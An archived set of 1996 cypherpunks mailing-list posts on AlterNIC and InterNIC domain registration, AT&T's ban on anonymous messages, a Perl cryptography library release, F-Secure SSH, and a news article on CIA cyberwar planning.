With all the talk about InterNIC zapping domains, there should be
some talk about other registries, Alternic.net : http://www.alternic.net
is offering an alpha test for registering new TLD's and the prices
are considerably less expensive than the Internic.


William Knowles
erehwon@c2.org
finger for public key

--Fwd--

 A L T E R N I C . N I C

 Is proud to announce .NIC!
 
 The folks at alternic.nic (formerly alternic.net) are proud to
 announce alpha testing of the .NIC top level domain name served up by:
 
 MX.ALTERNIC.NIC at 204.94.42.1
 
 Other names are served by .NIC...
 ----------------------------------------------------------------------
 
    * ALTERNIC.NIC is being built to create a truly PUBLIC Network
      information center, for the benefit of all, on and off the net.
    * ALTERNIC.NIC is broadcast to disseminate information on Internet
      related issues, and to research new ideas on promoting the
      Internet.
    * ALTERNIC.NIC will promote the concept of Top Level Domainsi, and
      the de-centralization of name service. To this end, ALTERNIC.NIC
      will accept registrations for .NIC top level domains, as well as
      for administration of new top level domains. For now ALTERNIC.NIC
      will accept the existance of and promote a limitted number of top
      level domains. It should be recognized that at this point the
      concept of TLD diversification is EXPERIMENTAL.
    * ALTERNIC.NIC Will accept new TLDs or domain names which fit the
      following criteria:
         o The TLD or domain name must not already be registered.
         o DNS must be active for any TLD or domain names.
         o Payment of fees must be made to ALTERNIC.NET in advance.
         o Disputes between name holders may be handled several ways:
              + Release of domain name rights by existing name holder.
                If you want a name that's already registered, offer to
                buy the holder's rights.
              + ALTERNIC.NET will honour court orders from the
                jurisdiction which the domain name is currently
                registered in.
              + Sue ALTERNIC.NET. We're a privately held company, and
                do as we please. If you'd like to serve us with papers,
                it's dba A Towing Company, Inc., a Corporation
                registered with the Secretary of State of Washington
                State, USA. Of course, we'll have our corporate
                attorney counter-sue, and you can do it on our turf, OK


--End Fwd--





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 26 Jun 1996 17:37:36 +0800
To: cypherpunks@toad.com
Subject: Re: AT&T bans anonymous messages
Message-ID: <adf6129b05021004e930@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:02 AM 6/26/96, Intense wrote:
>On Tue, 25 Jun 1996, Rich Graves wrote:
>
>> given username. If you send a message traceable to AT&T, they are held
>> accountable. I think it's reasonable for them to demand that you make
>> messages traceable to yourself so that you are held accountable.
>
>Under the common carrier law, i do not think that would apply


I agree that ISPs are unlikely to be held liable for messages passing
through their systems, but not because they have been determined to be
"common carriers." So far as I know, no ISP has been so classified.

(I'm not even sure what is involved in being classified as a common
carrier. Perhaps someone out there knows about these matters.)

However, it seems to me that the "Electronic Communications Privacy Act,"
the ECPA, gives an ISP a good defense. The ECPA forbids the interception of
electronic mail (usual caveats about special exceptions), and so an ISP
ostensibly is not supposed to be reading e-mail messages. Thus, an ISP
would seem to have a pretty good defense in court, claiming that the ECPA
explicitly precluded it from seeing what users were saying in e-mail.

(But I am not a lawyer, and it would not surprise me at all if an ISP is
someday held liable, despite the ECPA. "You can't read the mail, but you're
still responsible. You should have known. Or at least we can go after you
and shut you down.")

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gregmi@galileo.mis.net (Greg Miller)
Date: Wed, 26 Jun 1996 11:14:37 +0800
To: Shifter <shifter@portal.stwing.upenn.edu>
Subject: Re: domain name zapping threat by Internic
In-Reply-To: <199606251353.JAA07632@portal.stwing.upenn.edu>
Message-ID: <31d064a7.751384@pop.mis.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 25 Jun 1996 09:53:17 -0400 (EDT), you wrote:

>And then there could be competition, which could potentially create some
>bad scenarios.  What if one registration service refused to propagate their
>domains to other registration services?

	Then no one would use them for DNS service.  Back when the NIC first
started charging for services I remember seeing a message from someone who was
going to attempt to make another root name service, but I haven't heard much
about it since.
	Since the NIC charges $100 per registration, you can bet there will be
some legislation somewhere along the line.  They must be makeing 5000-10000%
profit.



Greg Miller: Programmer/Analyst
DOS -- A user friendly version of UNIX.
gregmi@mis.net
http://grendel.ius.indiana.edu/~gmiller/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 26 Jun 1996 11:45:14 +0800
To: cypherpunks@toad.com
Subject: Re: Appology
Message-ID: <199606252230.WAA28672@pipe5.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jun 25, 1996 21:14:56, 'chris.liljenstolpe@SSDS.com (Christopher
Liljenstolpe)' wrote: 
 
>... the meaning of r and R have been reversed 
 
 
Way it is, Chris, 
 
 
The motherfucking Best and Brightest did that to us all time in Nam,
granting us a few days to stumble around fuck-you-GIs-it-ain't-our-war
Aussieland, with a few stolen hours layover, hungover puking up poison, in
Thailand, then back to eating their Ivy League shit sandwiches. 
 
 
There it is, live with it -- or frag their pasty asses back to the stoned
age. 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 26 Jun 1996 18:00:58 +0800
To: cypherpunks@toad.com
Subject: Re: AT&T bans anonymous messages
Message-ID: <199606260559.WAA27746@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


My AT&T Worldnet material finally came, and I was similarly anti-impressed
with the policies against anonymity, indecency, and other things that
their lawyers probably told them would cause them less hassle to ban
outright than to not mention until they get complaints later (sigh...)
(To give them a small bit of slack, the service did come out just about
when the CDA got signed, so it's no surprise they'd cover their <noun deleted>.)
I know some Worldnet folks, and I'll try to work my way up the food chain
to see if I can find who did it, and how flexible they are.
There are also some worldnet.* newsgroups where this can be discussed;
that'd be a good place for issues like alt.sexual-abuse.recovery and
other politically correct reasons for anonymity.

Adam Shostack asked what services it provides - the 5-hour-free/$20-unlimited
service gets you PPP, a POP3 mailbox, and servers for DNS, NNTP, SMTP,
and technical support.  There are also business services that get you 
anything from raw SLIP to frame relay to with us installing and managing 
routers on your premises and doing primary DNS service.  

Tim wrote:
>I agree with Hal's points, but I suspect that these technicalities will be
>ignored when the first _complaint_ reaches the DeathStar's administrators.
>"Your account has been cancelled."

I'd guess that the first complaint will either be ignored (because they're
busy trying to get the service on line and scaled up to 500,000 people)
or else get the account squashed without a second thought (because they're
busy trying to get the service on line and scaled up to 500,000 people),
but the first few spams that cause mass quantities of complaints will start
to get people thinking.  

>I suspect other major ISPs will adopt similar language, absent a vocal
>lobbying group for anonymous messaging capabilities.

If I remember right, Netcom doesn't permit remailers (or at least discouraged
one or two of them), but they'd rather not know about content, don't
censor users, and do censor spammers.

Disclaimer: This posting is official policy for any shares of AT&T stock
that I own, which will be listened to the next time the issue appears
on shareholders' ballot question....



#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Distract Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Intense <exalt@miworld.net>
Date: Wed, 26 Jun 1996 15:58:39 +0800
To: cypherpunks@toad.com
Subject: Re: AT&T bans anonymous messages
In-Reply-To: <Pine.GUL.3.93.960625113555.328B-100000@Networking.Stanford.EDU>
Message-ID: <Pine.LNX.3.91.960625230149.659A-100000@invictor.miworld.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 25 Jun 1996, Rich Graves wrote:

> given username. If you send a message traceable to AT&T, they are held
> accountable. I think it's reasonable for them to demand that you make
> messages traceable to yourself so that you are held accountable. 

Under the common carrier law, i do not think that would apply




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reg Harbeck <rharbeck@freenet.calgary.ab.ca>
Date: Wed, 26 Jun 1996 17:40:29 +0800
To: lacc@suburbia.net>
Subject: Re: LACC:       Re: Tales from the UK: Basel Part IV
In-Reply-To: <199606251952.MAA13356@toad.com>
Message-ID: <Pine.A32.3.92.960625225052.34342A-100000@srv1.freenet.calgary.ab.ca>
MIME-Version: 1.0
Content-Type: text/plain


Time to insert a cautionary thought into this whole Info-war HERFsteria:

I'm just an EDP Security Specialist with 10 years experience in
Mainframe, PC and Network systems, and not some great expert with an
international reputation to protect, so take this for what it's worth.

However, I get the impression that there are some pretty smart people on
these lists.  You know, the kind of people who, when you say, "someone
just did the impossible," will figure out how they did it to solve the
mystery.  And there are also some people who like to look pretty smart by
going around and saying the kind of things that those pretty smart people
figured out, in order to enhance their reputation and keep their audiences
worried.  And there might even be people who'd be inclined to go out and
try those things that the pretty smart people figured out.

So, let's say that some public wanna-be-smart decides that they need to
scare people with stories of evil things that might be done, and so they
post a story of how they've already been claimed to be done, just to see
how the really-are-smart folks respond.  And then they go and take all
that free stuff and make a bundle off of it, and maybe hackers use it,
and, well, you get the idea.

Now, I'm not saying anyone on these lists does any of this stuff, 'cuz I
don't know.  But when it gets to speculation, well, maybe lets just say
the bogeyman did it, with help from his evil hacker friend Foobar.  It's a
lot safer, and maybe just as true.

-----
$0.02

- Reg Harbeck     (URL: http://www.freenet.calgary.ab.ca/~rharbeck)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Wed, 26 Jun 1996 11:43:49 +0800
To: cypherpunks@toad.com
Subject: [Announce] New version of Systemics crypto library for Perl
Message-ID: <199606252123.XAA27992@internal-mail.systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


The Systemics Cryptix crypto library for Perl is now available for
download at http://www.systemics.com/software/

Apart from much tidying up, there have been several signigicant additions
to the library, include a Blowfish implementation, RSA encryption
(including key generation routines), CFB and CBC block cipher mode modules,
and a cryptographically secure random stream generator.

This library is not currently on CPAN, since several modules are not
in a suitable state for CPAN distribution.  However, if anyone can
rectify this, then we are happy to place them on CPAN.

Enjoy!

P.S. - PGP library on it's way soon (hopefully this weekend!)



                        CRYPTIX LIBRARY FOR PERL (V1.1)
                                       
   
     _________________________________________________________________
   
Description

   This library contains a suite of cryptographic and mathematical
   modules for Perl. Many of the more CPU intensive algorithms have been
   implemented in C as Perl extensions.
   
Features

  Perl extensions
  
   All of the following have been implemented as Perl extensions in C:

     * Crypt::Blowfish module (Blowfish implementation by A.M. Kuchling).
     * Crypt::DES module (DES implementation by Eric Young).
     * Crypt::IDEA module.
     * Crypt::MD5 module (based on an implementation by Neil Winton and
       Data Security, Inc.)
     * Crypt::SHA module (based on an implementation by Uwe Hollerbach
       and based on code from NIST and Peter C. Gutmann)
     * Math::BigInteger module (based on code from Eric Young).
       This module implements arbitrary length integers and some
       associated mathematical functions.
     * Math::PRSG - Pseudo random sequence generator
       This module implements a 160 bit LFSR for use in generating pseudo
       random sequences.
     * Math::TrulyRandom module, based on code from Don Mitchell and Matt
       Blaze (AT&T).
       This module generates "truly random" numbers, based on interrupt
       timing discrepancies.
       
Perl modules

   All of the following have been implemented in Perl:

     * Crypt::CBC module
       This module implements CBC block cipher mode.
     * Crypt::CFB module
       This module implements CFB block cipher mode.
     * Crypt::CSRandomStream module
       This module implements a cryptographically secure random stream.
       It implements the Stream::DataInput interface.
     * Crypt::DES3EDE module
       This module implements triple DES (EDE mode).
     * Crypt::HashMD5
       This module implements an MD5 hash, which derives from
       Crypt::MessageDigest.
     * Crypt::HashSHA
       This module implements an SHA hash, which derives from
       Crypt::MessageDigest.
     * Crypt::MessageDigest
       This module implements the Crypt::MessageDigest base class.
     * Crypt::RSAKey
       This module implements the RSA key base class.
     * Crypt::RSAKeyGen
       This module is used for the generation of RSA key pairs.
     * Crypt::RSAPublicKey
       This module implements an RSA public key, which derives from
       Crypt::RSAKey.
     * Crypt::RSASecretKeyPair
       This module implements an RSA public/secret key pair, which
       derives from Crypt::RSAKey.
     * Math::MPI module
       This module implements the reading and writing of Philip
       Zimmermans MPI format large integers.
     * Math::PseudoRandomStream module
       This module implements a pseudo random data stream. It implements
       the Stream::DataInput interface.
     * Math::Random module
       This module contains a collection of various random number
       routines.
     * Math::TestPrime module
       This module is used to test the primality of an instance of
       Math::BigInteger.
     * Stream::DataEncoding
     * Stream::DataInput
     * Stream::DataOutput
     * Stream::FileInput
     * Stream::FileOutput
     * Stream::Streamable
     * Stream::StringInput
     * Stream::StringOutput
       
Copyright

   This library includes (or is derived from) software developed by (and
   owned by) the following:
     * Peter C. Gutmann
     * Uwe Hollerbach &ltuh@alumni.caltech.edu>
     * A.M. Kuchling
     * Don Mitchell and Matt Blaze (AT&T)
     * NIST
     * RSA Data Security, Inc.
     * Neil Winton &ltN.Winton@axion.bt.co.uk>
     * Eric Young &lteay@mincom.oz.au>
       
   
   Other parts of the library are covered by the following licence:
   
   Copyright (c) 1995, 1996 Systemics Ltd (http://www.systemics.com/) All
   rights reserved.
   
   This library and applications are FREE FOR COMMERCIAL AND
   NON-COMMERCIAL USE as long as the following conditions are adhered to.
   
   
   Copyright remains with Systemics Ltd, and as such any Copyright
   notices in the code are not to be removed. If this code is used in a
   product, Systemics should be given attribution as the author of the
   parts used. This can be in the form of a textual message at program
   startup or in documentation (online or textual) provided with the
   package.
   
   Redistribution and use in source and binary forms, with or without
   modification, are permitted provided that the following conditions are
   met:
    1. Redistributions of source code must retain the copyright notice,
       this list of conditions and the following disclaimer.
    2. Redistributions in binary form must reproduce the above copyright
       notice, this list of conditions and the following disclaimer in
       the documentation and/or other materials provided with the
       distribution.
    3. All advertising materials mentioning features or use of this
       software must display the following acknowledgement:
       
        This product includes software developed by Systemics Ltd
                (http://www.systemics.com/)
                
   
   THIS SOFTWARE IS PROVIDED BY SYSTEMICS LTD ``AS IS'' AND ANY EXPRESS
   OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
   WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
   DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE FOR
   ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
   DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
   GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
   INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
   IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
   OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
   ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
   
   The licence and distribution terms for any publically available
   version or derivative of this code cannot be changed. i.e. this code
   cannot simply be copied and put under another distribution licence
   [including the GNU Public Licence.]
   
   
     _________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Wed, 26 Jun 1996 18:38:23 +0800
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: domain name zapping threat by Internic
In-Reply-To: <199606251954.MAA13366@toad.com>
Message-ID: <960626.010919.5c5.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, stewarts@ix.netcom.com writes:

> At 02:05 PM 6/24/96 -0700, Vlad wrote:

> They also control the
> .org and .net hierarchies.  If you don't like it, you can always
> get a statist address in the .us domain or some other .xx government domain,
> or find someone who's got a second-level domain that will register you

Actually,  I just went through this.  I wanted scytale.net, but my ISP
rep was very upfront about my chances.  The .net is now reserved by
InterNIC for ISP's.  The .org domain is held for provable nonprofit
corps.  The .us domain was a possibility, but pragmatically impossible
due to the >4 month update latency in Minnesota.  Literally, the only
choice I had for a domain name was in the .com area.  It somewhat pissed
me off, since I really did not want my net.presence to look commercial.  
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMdDVShvikii9febJAQGqhQP9GfDPsXUVnNGJG3yft5OR/LF8cvHiSFN5
pwmhZr6TyfQTKCO9tB1JoHI4+ibIIuSaepoW3J5PU/ltlhaivc7UBYm6g2nin0ep
g59e5M8mQsFvoKvvRxFcgtfya22WXqkCkMTyR+fVwEzc503RkvDq9Yr0Kx7SaInK
k2rqiYXYs5s=
=HRqc
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Wed, 26 Jun 1996 17:31:17 +0800
To: jamesd@echeque.com
Subject: Re: Noise: Re: Those Evil Republicans
In-Reply-To: <199606251523.IAA04107@dns2.noc.best.net>
Message-ID: <9606260530.AA14412@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



I'm somewhat at a loss to understand your comment "worst famine in modern
Russian history", since modern Russian history could at the earliest be
said to start with the liberation of the serfs there is remarkably little
"modern Russian history" that was not under communist rule. Indeed it is 
difficult to imagine that any worse famine did occur at any time in Russias
history, unless you were to count some of the effects of world war 2. 

Since the appologists for Stalin outside Russia number in the low thousands
I'm at a loss to understand the relevance of your point. 

Similarly your point about government control of currency is somewhat puzzling. 
Are you arguing that we are less prosperous today than we were in the 1920's?
If so that would be a somewhat curious argument which you will no doubt 
share with us. The only modern country I know of which does not control its
currency is Lichenstein which uses the Swiss Franc, I'm not sure what lessons
can be learnt from a country whose chief ecconomic activities are gambling
and facilitating tax evasion however.

Now it may be that Bob Dole is secretly planning a radical change in the
ecconomic direction of the country but somehow I doubt that the position of 
chairman of the Federal Reserve is going to be going away soon. Indeed I
have not heard any Repulicans mioving towards yor policies which to me
sound more like those of William Jennings Bryant than Bob Dole. 

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Wed, 26 Jun 1996 17:34:53 +0800
To: jya@pipeline.com (John Young)
Subject: Re: Leahy vs. Landers
Message-ID: <199606260600.CAA11201@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 25 Jun 96 at 17:58, John Young quoted Ann Landers:
                                                                     
>                                                                   ... The 
>    Internet is tailor-made for con men, the lonely and the 
>    bored. The word from here is beware. More on this subject 
>    tomorrow. 

Gee? Is that why the DoD created ARPANet?  To help con men (well, 
there's the $200 hammers, er "multivariable handheld impact devices") 
and all of those lonely gronks based on ships and bases in B.F.E...

Seriously though...

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Wed, 26 Jun 1996 18:30:46 +0800
To: brian dodds <jyacc!aspen!bdodds@uunet.uu.net>
Subject: f-secure..
Message-ID: <199606260638.CAA00732@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 25 Jun 96 at 17:45, brian dodds wrote:
[..]
> at any rate - has anyone tried out that new f-secure by the folks who 
> brought us f-prot? "military strength internet encryption".. seems to be 
> an encrypted telnet, but i can't replace our server to test it..

No. I'll have to look for it.

In the F-Prot does they explicitly endorse using PGP (esp. for 
sending infected files to them for analysis, as well as for checking 
signatures of binaries in the F-Prot package).

They also do the same academic hedging about effectiveness of their 
anti-virus package that a good crypto package would use, so I suspect 
they're likely to produce a good crypto package.

BTW, they're located in Iceland, at the complex.is domain.  AFAIK, no 
export restrictions there.

Rob.



 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Wed, 26 Jun 1996 19:38:16 +0800
To: cypherpunks@toad.com
Subject: RFD: Developing Nations and crypto (based on excertp from Edupag
Message-ID: <199606260805.EAA01587@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


An interesting possibility: information tech expands and 'centers' in 
third-world/developing countries, since (1) they need to skip 
industrial techs to catch up to N.America, Europe, etc. (2) they 
aren't bogged down in older ways of doing business, communicating, 
etc. (3) 'emerging democracies' might embrace crypto tech as a 
safeguard against Orwellian practices, to use digital authentication 
to protect from fraud, etc. (4) cheaper costs for rent, wages, etc. 
[though in many cases exploitavily cheap] may outweigh building an 
infrastructure from scratch, (5) building an infrastructure from 
scratch has advantages of building in flexibility towards uses that 
were not built into older structures in N.Am, Eur., etc. (6) desire 
for investment (7) desire for skills or tech to drive education etc. 
in region



------- Forwarded Message Follows -------
From:          Edupage Editors <educom@elanor.oit.unc.edu>
[..]
DEVELOPING NATIONS SEE BRIGHT FUTURE IN SMART CARDS
When it comes to full-scale trials of smart card technology, developing
countries such as Zambia and Thailand are way ahead of the U.S.  The new
payment systems are finding greater acceptance in countries where
traditional banking practices are not so firmly entrenched.  "No one's in a
hurry for a new payment system here because our system already works," says
a U.S. programmer who designed Zambia's smart card system.  "Our country is
expanding, and we don't have enough banks and no automated teller
machines...  The lines are very long,"  says a spokesman for the Zambian
embassy in Washington.  And smart cards provide valuable access to other
technological advances:  "Developing nations are using smart cards to
leapfrog the need to build telecommunications infrastructures," says a Visa
VP.  (Investor's Business Daily 25 Jun 96 A8)
[..]
Educom Update ...  is our twice-a-month electronic summary of
organizational news and events. To subscribe, send mail to:
listproc@educom.unc.edu with the message:  subscribe update Charles Revson
(if your name is Charles Revson;  otherwise, substitute your own name).
[..]
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 26 Jun 1996 21:30:46 +0800
To: William Knowles <erehwon@c2.org>
Subject: Re: Alternic.net (was domain zapping)
In-Reply-To: <Pine.SUN.3.91.960625220103.16972A@infinity.c2.org>
Message-ID: <199606260954.FAA02843@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



William Knowles writes:
> With all the talk about InterNIC zapping domains, there should be
> some talk about other registries, Alternic.net : http://www.alternic.net
> is offering an alpha test for registering new TLD's and the prices
> are considerably less expensive than the Internic.

The AlterNIC is a figment of its creators imagination. It has about
the same credibility level as the claim of the Freemen that they
aren't subject to U.S. law.

They can offer to sell you anything they like, of course, and you can
pay them, but you don't get anything at all for the money. Domains
registered with them don't appear in the real DNS.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 26 Jun 1996 23:30:43 +0800
To: cypherpunks@toad.com
Subject: CIA Fears UmpTeen InfoNukes
Message-ID: <199606261126.LAA02542@pipe2.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, June 26, 1996, p. B7. 
 
 
   Head of C.I.A. Plans Center To Protect Federal Computers 
 
   By Tim Weiner 
 
 
   Washington, June 25 -- Alarmed at the growing threat that 
   computer hackers pose to national security, the Director of 
   Central Intelligence today announced plans to create a 
   "cyberwar" center to protect the bits and bytes that weave 
   the nation together. 
 
   The United States cannot be brought to its knees by a 
   madman with a modem. But the Director, John M. Deutch, said 
   the nation's intelligence agencies were alert to the threat 
   of "very, very large" attacks on the computers that run 
   Defense Department war rooms, power plants, telephone 
   systems, air traffic control centers and international 
   financial transfers. 
 
   "The electron," Mr. Deutch warned, "is the ultimate 
   precision-guided weapon." 
 
   Mr. Deutch said he was seeking to create a cyberwar center 
   at the National Security Agency, the giant electronic 
   eavesdropping branch of American intelligence. He said the 
   center could focus the Government's previously scattershot 
   efforts to understand and combat the threats posed by 
   governments, terrorist groups and mischievous teen-agers. 
 
   Mr. Deutch's first public statement about information 
   warfare came in testimony before Senator Sam Nunn, the 
   Georgia Democrat who called a hearing of a Senate 
   Governmental Affairs subcommittee to discuss the 
   little-understood, highly classified problem. 
 
   "There are some who believe we are going to have to have an 
   electronic Pearl Harbor, so to speak, before we really make 
   this the kind of priority that many of us believe it 
   deserves to be made," Mr. Nunn said. "Do you think we're 
   going to need that kind of real awakening, or are we fully 
   alerted to this danger now?" 
 
   Mr. Deutch replied: "I think that we are fully alerted to 
   it now. I don't know whether we will face an electronic 
   Pearl Harbor, but we will have, I'm sure, some very 
   unpleasant circumstances." 
 
   He added, "I'm certainly prepared to predict some very, 
   very large and uncomfortable incidents." 
 
   Mr. Deutch said cyberwar could become a 21st-century 
   national security threat second only to nuclear, biological 
   and chemical weapons. 
 
   Potential attackers may already possess the sophisticated 
   techniques they would need to bring off a cataclysmic 
   crash, many experts believe, but they still lack the deep 
   knowledge of their targets and direct access to the 
   computer systems they would seek to disable. 
 
   Military and civilian organizations are increasingly 
   dependent on evermore complicated and interlinked systems. 
   They run the risk of understanding the threat less and less 
   as it becomes more and more complex Mr. Nunn and Mr. Deutch 
   suggested. 
 
   Senator Nunn also said intelligence agencies have 
   communications problems with banks, telecommunications 
   companies and other business ventures vulnerable to cyber 
   attacks. 
 
   "There's a great reluctance by the private sector to 
   discuss the threat that they've faced or even the attacks 
   that have already occurred," he said, "because they fear 
   that the word would go out they're vulnerable, and 
   therefore could destroy or damage consumer confidence and 
   thereby cost them business." 
 
   "At some point," the Senator added, "there's got to be 
   communication here." 
 
   [End] 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Wed, 26 Jun 1996 19:40:37 +0800
To: cypherpunks@toad.com
Subject: Re: f-secure..
In-Reply-To: <199606260638.CAA00732@unix.asb.com>
Message-ID: <Pine.GSO.3.93.960626112325.29256A-100000@nebula.online.ee>
MIME-Version: 1.0
Content-Type: text/plain


 Wed, 26 Jun 1996, Deranged Mutant wrote:

> On 25 Jun 96 at 17:45, brian dodds wrote:
> [..]
> > at any rate - has anyone tried out that new f-secure by the folks who 
> > brought us f-prot? "military strength internet encryption".. seems to be 
> > an encrypted telnet, but i can't replace our server to test it..
> 
> BTW, they're located in Iceland, at the complex.is domain.  AFAIK, no 
> export restrictions there.

F-secure is a new commercial version of the SSH package, written by Tatu
Ylonen from Finland. It uses the SSH protocol v2.0 and it is developed and
sold by Data Fellows from Finland, http://www.datafellows.com/
Cryptographic algorithms are RSA, IDEA and 3-key 3DES. It can be sold both
inside and outside the US. I would say the SSH package is very secure and
very well designed.

Jüri Kaljundi
AS Stallion
jk@stallion.ee





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Wed, 26 Jun 1996 21:33:22 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: Noise: Re: Those Evil Republicans
In-Reply-To: <9606260530.AA14412@Etna.ai.mit.edu>
Message-ID: <31D104C6.62319AC4@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


hallam@Etna.ai.mit.edu wrote:
> 
> Similarly your point about government control of currency is somewhat puzzling.
> Are you arguing that we are less prosperous today than we were in the 1920's?
> If so that would be a somewhat curious argument which you will no doubt
> share with us. The only modern country I know of which does not control its
> currency is Lichenstein which uses the Swiss Franc,

There are dozens - Jersey, Isle of Man, Andorra, ...

> I'm not sure what lessons
> can be learnt from a country whose chief ecconomic activities are gambling
> and facilitating tax evasion however.

Ever heard of Goodhearts law?  (something along the lines of
"efforts to regulate something will result in it moving somewhere
unregulated").

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Thu, 27 Jun 1996 02:09:16 +0800
To: cypherpunks@toad.com
Subject: Re: CIA Fears UmpTeen InfoNukes
In-Reply-To: <199606261126.LAA02542@pipe2.t2.usa.pipeline.com>
Message-ID: <31D13BF9.467A@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


John Young wrote:

>    "The electron," Mr. Deutch warned, "is the ultimate
>    precision-guided weapon."

I'd like to claim this for potential use in a .signature, if nobody
else has thusly used it already.


By the way, there was a thing in the Yahoo/Reuters feed about "attacks"
on DoD computers; apparently British police arrested a "hacker" the
other day.  Anyway, the article included a claim that there have been
250,000 attempted break-ins on DoD computers over the past year.

Does anybody know how they count that?

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 27 Jun 1996 06:54:01 +0800
To: cypherpunks@toad.com
Subject: Re: RFD: Developing Nations and crypto (based on excertp from Edupag
Message-ID: <adf6b50a0602100412c8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:57 AM 6/26/96, Deranged Mutant wrote:
>An interesting possibility: information tech expands and 'centers' in
>third-world/developing countries, since (1) they need to skip
>industrial techs to catch up to N.America, Europe, etc. (2) they
>aren't bogged down in older ways of doing business, communicating,
